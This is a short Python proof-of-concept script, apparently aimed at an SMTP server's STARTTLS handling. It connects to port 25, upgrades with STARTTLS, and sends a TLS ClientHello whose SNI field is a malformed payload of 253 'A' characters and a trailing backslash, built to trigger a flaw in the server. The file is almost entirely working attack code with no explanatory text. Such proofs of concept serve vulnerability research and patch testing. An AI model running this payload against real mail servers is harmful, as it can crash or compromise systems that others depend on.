starttls_smtp.py

import scapy
from scapy_ssl_tls.ssl_tls import *

from socket import *

cc = socket(AF_INET, SOCK_STREAM)
cc.connect(("127.0.0.1", 25))
print(str(cc.recv(1024)))

cc.send('ehlo localhost\r\n')
print(str(cc.recv(1024)))

cc.send('starttls\r\n')
print(str(cc.recv(1024)))

sni_payload = ('A'* 253) + "\\"

tls_version = TLSVersion.TLS_1_0
ciphers = [TLSCipherSuite.RSA_WITH_AES_128_CBC_SHA]
extensions = [TLSExtension() / TLSExtServerNameIndication(server_names=TLSServerName(data=sni_payload))]

with TLSSocket(cc, client=True) as tls_socket:
    tls_ctx = tls_socket.tls_ctx

    try:
        server_hello, server_kex = tls_socket.do_handshake(tls_version, ciphers, extensions)
        server_hello.show()
    except TLSProtocolError as tpe:
        print("Got TLS error: %s" % tpe)
        tpe.response.show()
    else:
        resp = tls_socket.do_round_trip(TLSPlaintext(data="HELP\r\n"))
        print("Got response from server")
        resp.show()

        resp = tls_socket.do_round_trip(TLSPlaintext(data="QUIT\r\n"))
        print("Got response from server")
        resp.show()
    finally:
        print(tls_socket.tls_ctx)
        tls_socket.close()